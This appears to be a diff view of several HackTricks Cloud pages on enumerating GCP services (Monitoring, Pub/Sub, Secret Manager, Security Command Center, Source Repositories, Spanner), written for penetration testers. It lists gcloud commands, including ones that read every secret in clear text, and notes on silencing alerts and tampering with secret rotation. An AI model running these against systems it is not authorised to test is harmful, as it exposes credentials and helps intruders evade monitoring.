* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Basic Information
Google Cloud Monitoring offers a suite of tools to **monitor**, troubleshoot, and improve the performance of your cloud resources. From a security perspective, Cloud Monitoring provides several features that are crucial for maintaining the security and compliance of your cloud environment:
### Policies
Policies **define conditions under which alerts are triggered and how notifications are sent**. They allow you to monitor specific metrics or logs, set thresholds, and determine where and how to send alerts (like email or SMS).
### Dashboards
Monitoring Dashboards in GCP are customizable interfaces for visualizing the **performance and status of cloud resources**. They offer real-time insights through charts and graphs, aiding in efficient system management and issue resolution.
### Channels
Different **channels** can be configured to **send alerts** through various methods, including **email**, **SMS**, **Slack**, and more.
Moreover, when an alerting policy is created in Cloud Monitoring, it's possible to **specify one or more notification channels**.
### Snoozers
A snoozer will **prevent the indicated alert policies to generate alerts or send notifications** during the indicated snoozing period. Additionally, when a snooze is applied to a **metric-based alerting policy**, Monitoring proceeds to **resolve any open incidents** that are linked to that specific policy.
### Enumeration
{% code overflow="wrap" %}
```bash
# Get policies
gcloud alpha monitoring policies list
gcloud alpha monitoring policies describe <policy>
# Get dashboards
gcloud monitoring dashboards list
gcloud monitoring dashboards describe <dashboard>
# Get snoozers
gcloud monitoring snoozes list
gcloud monitoring snoozes describe <snoozer>
# Get Channels
gcloud alpha monitoring channels list
gcloud alpha monitoring channels describe <channel>
```
{% endcode %}
### Post Exploitation
{% content-ref url="../gcp-post-exploitation/gcp-monitoring-post-exploitation.md" %}
[gcp-monitoring-post-exploitation.md](../gcp-post-exploitation/gcp-monitoring-post-exploitation.md)
{% endcontent-ref %}
## References
* [https://cloud.google.com/monitoring/alerts/manage-snooze#gcloud-cli](https://cloud.google.com/monitoring/alerts/manage-snooze#gcloud-cli)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

120
pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.md Normal file
View File

@@ -0,0 +1,120 @@
# GCP - Pub/Sub Enum
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Pub/Sub <a href="#reviewing-cloud-pubsub" id="reviewing-cloud-pubsub"></a>
[Google **Cloud Pub/Sub**](https://cloud.google.com/pubsub/) is described as a service facilitating message exchange between independent applications. The core components include **topics**, to which applications can **subscribe**. Subscribed applications have the capability to **send and receive messages**. Each message comprises the actual content along with associated metadata.
The **topic is the queue** where messages are going to be sent, while the **subscriptions** are the **objects** users are going to use to **access messages in the topics**. There can be more than **1 subscription per topic** and there are 4 types of subscriptions:
* **Pull**: The user(s) of this subscription needs to pull for messages.
* **Push**: An URL endpoint is indicated and messages will be sent immediately to it.
* **Big query table**: Like push but setting the messages inside a Big query table.
* **Cloud Storage**: Deliver messages directly to an existing bucket.
By **default** a **subscription expires after 31 days**, although it can be set to never expire.
By **default**, a message is **retained for 7 days**, but this time can be **increased up to 31 days**. Also, if it's not **ACKed in 10s** it goes back to the queue. It can also be set that ACKed messages should continue to be stored.
A topic is by default encrypted using a **Google managed encryption key**. But a **CMEK** (Customer Managed Encryption Key) from KMS can also be selected.
**Dead letter**: Subscriptions may configure a **maximum number of delivery attempts**. When a message cannot be delivered, it is **republished to the specified dead letter topic**.
### Snapshots & Schemas
A snapshot is a feature that **captures the state of a subscription at a specific point in time**. It is essentially a consistent **backup of the unacknowledged messages in a subscription**. By creating a snapshot, you preserve the message acknowledgment state of the subscription, allowing you to resume message consumption from the point the snapshot was taken, even after the original messages would have been otherwise deleted.\
If you are very lucky a snapshot could contain **old sensitive information** from when the snapshot was taken.
When creating a topic, you can indicate that the **topic messages must follow a schema**.
### Enumeration
```bash
# Get a list of topics in the project
gcloud pubsub topics list
gcloud pubsub topics describe <topic>
gcloud pubsub topics list-subscriptions <topic>
gcloud pubsub topics get-iam-policy <topic>
# Get a list of subscriptions across all topics
gcloud pubsub subscriptions list
gcloud pubsub subscriptions describe <subscription>
gcloud pubsub subscriptions get-iam-policy <subscription>
# Get list of schemas
gcloud pubsub schemas list
gcloud pubsub schemas describe <schema>
gcloud pubsub schemas list-revisions <schema>
# Get list of snapshots
gcloud pubsub snapshots list
gcloud pubsub snapshots describe <snapshot>
```
However, you may have better results [**asking for a larger set of data**](https://cloud.google.com/pubsub/docs/replay-overview), including older messages. This has some prerequisites and could impact applications, so make sure you really know what you're doing.
### Privilege Escalation & Post Exploitation
{% content-ref url="../gcp-post-exploitation/gcp-pub-sub-post-exploitation.md" %}
[gcp-pub-sub-post-exploitation.md](../gcp-post-exploitation/gcp-pub-sub-post-exploitation.md)
{% endcontent-ref %}
## Pub/Sub Lite
[**Pub/Sub Lite**](https://cloud.google.com/pubsub/docs/choosing-pubsub-or-lite) is a messaging service with **zonal storage**. Pub/Sub Lite **costs a fraction** of Pub/Sub and is meant for **high volume streaming** (up to 10 million messages per second) pipelines and event-driven system where low cost is the primary consideration.
In PubSub Lite there **are** **topics** and **subscriptions**, there **aren't snapshots** and **schemas** and there are:
* **Reservations**: Pub/Sub Lite Reservations is a feature that allows users to reserve capacity in a specific region for their message streams.
* **Operations**: Refers to the actions and tasks involved in managing and administering Pub/Sub Lite.
### Enumeration
```bash
# lite-topics
gcloud pubsub lite-topics list
gcloud pubsub lite-topics describe <topic>
gcloud pubsub lite-topics list-subscriptions <topic>
# lite-subscriptions
gcloud pubsub lite-subscriptions list
gcloud pubsub lite-subscriptions describe <subscription>
# lite-reservations
gcloud pubsub lite-reservations list
gcloud pubsub lite-reservations describe <topic>
gcloud pubsub lite-reservations list-topics <topic>
# lite-operations
gcloud pubsub lite-operations list
gcloud pubsub lite-operations describe <topic>
```
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

79
pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.md Normal file
View File

@@ -0,0 +1,79 @@
# GCP - Secrets Manager Enum
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Secret Manager
Google [**Secret Manager**](https://cloud.google.com/solutions/secrets-management/) is a vault-like solution for storing passwords, API keys, certificates, files (max 64KB) and other sensitive data.
A secret can have **different versions storing different data**.
Secrets by **default** are **encrypted using a Google managed key**, but it's **possible to select a key from KMS** to use to encrypt the secret.
Regarding **rotation**, it's possible to configure **messages to be sent to pub-sub every number of days**, the code listening to those messages can **rotate the secret**.
It's possible to configure a day for **automatic deletion**, when the indicated day is **reached**, the **secret will be automatically deleted**.
### Enumeration
```bash
# First, list the entries
gcloud secrets list
gcloud secrets get-iam-policy <secret_name>
# Then, pull the clear-text of any version of any secret
gcloud secrets versions list <secret_name>
gcloud secrets versions access 1 --secret="<secret_name>"
```
### Privilege Escalation
In the following page you can check how to **abuse secretmanager permissions to escalate privileges.**
{% content-ref url="../gcp-privilege-escalation/gcp-secretmanager-privesc.md" %}
[gcp-secretmanager-privesc.md](../gcp-privilege-escalation/gcp-secretmanager-privesc.md)
{% endcontent-ref %}
### Post Exploitation
{% content-ref url="../gcp-post-exploitation/gcp-secretmanager-post-exploitation.md" %}
[gcp-secretmanager-post-exploitation.md](../gcp-post-exploitation/gcp-secretmanager-post-exploitation.md)
{% endcontent-ref %}
### Persistence
{% content-ref url="../gcp-persistence/gcp-secret-manager-persistence.md" %}
[gcp-secret-manager-persistence.md](../gcp-persistence/gcp-secret-manager-persistence.md)
{% endcontent-ref %}
### Rotation misuse
An attacker could update the secret to **stop rotations** (so it won't be modified), or **make rotations much less often** (so the secret won't be modified) or to **publish the rotation message to a different pub/sub**, or modifying the rotation code being executed (this happens in a different service, probably in a Clound Function, so the attacker will need privileged access over the Cloud Function or any other service)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

120
pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.md Normal file
View File

@@ -0,0 +1,120 @@
# GCP - Security Enum
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Basic Information
Google Cloud Platform (GCP) Security encompasses a **comprehensive suite of tools** and practices designed to ensure the **security** of resources and data within the Google Cloud environment, divided into four main sections: **Security Command Center, Detections and Controls, Data Protection and Zero Turst.**
## **Security Command Center**
The Google Cloud Platform (GCP) Security Command Center (SCC) is a **security and risk management tool for GCP** resources that enables organizations to gain visibility into and control over their cloud assets. It helps **detect and respond to threats** by offering comprehensive security analytics, **identifying misconfigurations**, ensuring **compliance** with security standards, and **integrating** with other security tools for automated threat detection and response.
* **Overview**: Panel to **visualize an overview** of all the result of the Security Command Center.
* Threats: \[Premium Required] Panel to visualize all the **detected threats. Check more about Threats below**
* **Vulnerabilities**: Panel to **visualize found misconfigurations in the GCP account**.
* **Compliance**: \[Premium required] This section allows to **test your GCP environment against several compliance checks** (such as PCI-DSS, NIST 800-53, CIS benchmarks...) over the organization.
* **Assets**: This section **shows all the assets being used**, very useful for sysadmins (and maybe attacker) to see what is running in a single page.
* **Findings**: This **aggregates** in a **table findings** of different sections of GCP Security (not only Command Center) to be able to visualize easily findings that matters.
* **Sources**: Shows a **summary of findings** of all the different sections of GCP security **by sectio**n.
* **Posture**: \[Premium Required] Security Posture allows to **define, assess, and monitor the security of the GCP environment**. It works by creating policy that defines constraints or restrictions that controls/monitor the resources in GCP. There are several pre-defined posture templates that can be found in [https://cloud.google.com/security-command-center/docs/security-posture-overview?authuser=2#predefined-policy](https://cloud.google.com/security-command-center/docs/security-posture-overview?authuser=2#predefined-policy)
### **Threats**
From the perspective of an attacker, this is probably the **most interesting feature as it could detect the attacker**. However, note that this feature requires **Premium** (which means that the company will need to pay more), so it **might not be even enabled**.
There are 3 types of threat detection mechanisms:
* **Event Threats**: Findings produced by matching events from **Cloud Logging** based on **rules created** internally by Google. It can also scan **Google Workspace logs**.
* It's possible to find the description of all the [**detection rules in the docs**](https://cloud.google.com/security-command-center/docs/concepts-event-threat-detection-overview?authuser=2#how_works)
* **Container Threats**: Findings produced after analyzing low-level behavior of the kernel of containers.
* **Custom Threats**: Rules created by the company.
It's possible to find recommended responses to detected threats of both types in [https://cloud.google.com/security-command-center/docs/how-to-investigate-threats?authuser=2#event\_response](https://cloud.google.com/security-command-center/docs/how-to-investigate-threats?authuser=2#event_response)
### Enumeration
{% code overflow="wrap" %}
```bash
# Get a source
gcloud scc sources describe <org-number> --source=5678
## If the response is that the service is disabled or that the source is not found, then, it isn't enabled
# Get notifications
gcloud scc notifications list <org-number>
# Get findings (if not premium these are just vulnerabilities)
gcloud scc findings list <org-number>
```
{% endcode %}
### Post Exploitation
{% content-ref url="../gcp-post-exploitation/gcp-security-post-exploitation.md" %}
[gcp-security-post-exploitation.md](../gcp-post-exploitation/gcp-security-post-exploitation.md)
{% endcontent-ref %}
## Detections and Controls
* **Chronicle SecOps**: An advanced security operations suite designed to help teams increase their speed and impact of security operations, including threat detection, investigation, and response.
* **reCAPTCHA Enterprise**: A service that protects websites from fraudulent activities like scraping, credential stuffing, and automated attacks by distinguishing between human users and bots.
* **Web Security Scanner**: Automated security scanning tool that detects vulnerabilities and common security issues in web applications hosted on Google Cloud or another web service.
* **Risk Manager**: A governance, risk, and compliance (GRC) tool that helps organizations assess, document, and understand their Google Cloud risk posture.
* **Binary Authorization**: A security control for containers that ensures only trusted container images are deployed on Kubernetes Engine clusters according to policies set by the enterprise.
* **Advisory Notifications**: A service that provides alerts and advisories about potential security issues, vulnerabilities, and recommended actions to keep resources secure.
* **Access Approval**: A feature that allows organizations to require explicit approval before Google employees can access their data or configurations, providing an additional layer of control and auditability.
* **Managed Microsoft AD**: A service offering managed Microsoft Active Directory (AD) that allows users to use their existing Microsoft AD-dependent apps and workloads on Google Cloud.
## Data Protection
* **Sensitive Data Protection**: Tools and practices aimed at safeguarding sensitive data, such as personal information or intellectual property, against unauthorized access or exposure.
* **Data Loss Prevention (DLP)**: A set of tools and processes used to identify, monitor, and protect data in use, in motion, and at rest through deep content inspection and by applying a comprehensive set of data protection rules.
* **Certificate Authority Service**: A scalable and secure service that simplifies and automates the management, deployment, and renewal of SSL/TLS certificates for internal and external services.
* **Key Management**: A cloud-based service that allows you to manage cryptographic keys for your applications, including the creation, import, rotation, use, and destruction of encryption keys. More info in:
{% content-ref url="gcp-kms-enum.md" %}
[gcp-kms-enum.md](gcp-kms-enum.md)
{% endcontent-ref %}
* **Certificate Manager**: A service that manages and deploys SSL/TLS certificates, ensuring secure and encrypted connections to your web services and applications.
* **Secret Manager**: A secure and convenient storage system for API keys, passwords, certificates, and other sensitive data, which allows for the easy and secure access and management of these secrets in applications. More info in:
{% content-ref url="gcp-secrets-manager-enum.md" %}
[gcp-secrets-manager-enum.md](gcp-secrets-manager-enum.md)
{% endcontent-ref %}
## Zero Trust
* **BeyondCorp Enterprise**: A zero-trust security platform that enables secure access to internal applications without the need for a traditional VPN, by relying on verification of user and device trust before granting access.
* **Policy Troubleshooter**: A tool designed to help administrators understand and resolve access issues in their organization by identifying why a user has access to certain resources or why access was denied, thereby aiding in the enforcement of zero-trust policies.
* **Identity-Aware Proxy (IAP)**: A service that controls access to cloud applications and VMs running on Google Cloud, on-premises, or other clouds, based on the identity and the context of the request rather than by the network from which the request originates.
* **VPC Service Controls**: Security perimeters that provide additional layers of protection to resources and services hosted in Google Cloud's Virtual Private Cloud (VPC), preventing data exfiltration and providing granular access control.
* **Access Context Manager**: Part of Google Cloud's BeyondCorp Enterprise, this tool helps define and enforce fine-grained access control policies based on a user's identity and the context of their request, such as device security status, IP address, and more.
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

95
pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.md Normal file
View File

@@ -0,0 +1,95 @@
# GCP - Source Repositories Enum
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Basic Information <a href="#reviewing-cloud-git-repositories" id="reviewing-cloud-git-repositories"></a>
Google Cloud Source Repositories is a fully-featured, scalable, **private Git repository service**. It's designed to **host your source code in a fully managed environment**, integrating seamlessly with other GCP tools and services. It offers a collaborative and secure place for teams to store, manage, and track their code.
Key features of Cloud Source Repositories include:
1. **Fully Managed Git Hosting**: Offers the familiar functionality of Git, meaning you can use regular Git commands and workflows.
2. **Integration with GCP Services**: Integrates with other GCP services like Cloud Build, Pub/Sub, and App Engine for end-to-end traceability from code to deployment.
3. **Private Repositories**: Ensures your code is stored securely and privately. You can control access using Cloud Identity and Access Management (IAM) roles.
4. **Source Code Analysis**: Works with other GCP tools to provide automated analysis of your source code, identifying potential issues like bugs, vulnerabilities, or bad coding practices.
5. **Collaboration Tools**: Supports collaborative coding with tools like merge requests, comments, and reviews.
6. **Mirror Support**: Allows you to connect Cloud Source Repositories with repositories hosted on GitHub or Bitbucket, enabling automatic synchronization and providing a unified view of all your repositories.
### OffSec information <a href="#reviewing-cloud-git-repositories" id="reviewing-cloud-git-repositories"></a>
* The source repositories configuration inside a project will have a **Service Account** used to publishing Cloud Pub/Sub messages. The default one used is the **Compute SA**. However, **I don't think it's possible steal its token** from Source Repositories as it's being executed in the background.
* To see the code inside the GCP Cloud Source Repositories web console ([https://source.cloud.google.com/](https://source.cloud.google.com/)), you need the code to be **inside master branch by default**.
* You can also **create a mirror Cloud Repository** pointing to a repo from **Github** or **Bitbucket** (giving access to those platforms).
* It's possible to **code & debug from inside GCP**.
* By default, Source Repositories **prevents private keys to be pushed in commits**, but this can be disabled.
### Open In Cloud Shell
It's possible to open the repository in Cloud Shell, a prompt like this one will appear:
<figure><img src="../../../.gitbook/assets/image (325).png" alt=""><figcaption></figcaption></figure>
This will allow you to code and debug in Cloud Shell (which could get cloudshell compromised).
### Enumeration
{% code overflow="wrap" %}
```bash
# Repos enumeration
gcloud source repos list #Get names and URLs
gcloud source repos describe <repo_name>
gcloud source repos get-iam-policy <repo_name>
# gcloud repo clone
gcloud source repos clone <REPO NAME>
gcloud source repos get-iam-policy <REPO NAME>
... git add & git commit -m ...
git push --set-upstream origin master
git push -u origin master
# Access via git
## To add a SSH key go to https://source.cloud.google.com/user/ssh_keys (no gcloud command)
git clone ssh://username@domain.com@source.developers.google.com:2022/p/<proj-name>/r/<repo-name>
git add, commit, push...
```
{% endcode %}
### Privilege Escalation & Post Exploitation
{% content-ref url="../gcp-privilege-escalation/gcp-sourcerepos-privesc.md" %}
[gcp-sourcerepos-privesc.md](../gcp-privilege-escalation/gcp-sourcerepos-privesc.md)
{% endcontent-ref %}
### Unauthenticated Enum
{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md" %}
[gcp-source-repositories-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md)
{% endcontent-ref %}
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

57
pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.md Normal file
View File

@@ -0,0 +1,57 @@
# GCP - Spanner Enum
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## [Cloud Spanner](https://cloud.google.com/sdk/gcloud/reference/spanner/)
Fully managed relational database with unlimited scale, strong consistency, and up to 99.999% availability.
```bash
# Cloud Spanner
## Instances
gcloud spanner instances list
gcloud spanner instances describe <INSTANCE>
gcloud spanner instances get-iam-policy <INSTANCE>
## Databases
gcloud spanner databases list --instance <INSTANCE>
gcloud spanner databases describe --instance <INSTANCE> <db_name>
gcloud spanner databases get-iam-policy --instance <INSTANCE> <db_name>
gcloud spanner databases execute-sql --instance <INSTANCE> --sql <sql> <db_name>
## Backups
gcloud spanner backups list --instance <INSTANCE>
gcloud spanner backups get-iam-policy --instance <INSTANCE> <backup_name>
## Instance Configs
gcloud spanner instance-configs list
gcloud spanner instance-configs describe <name>
```
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

59
pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.md Normal file
View File

@@ -0,0 +1,59 @@
# GCP - Stackdriver Enum
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
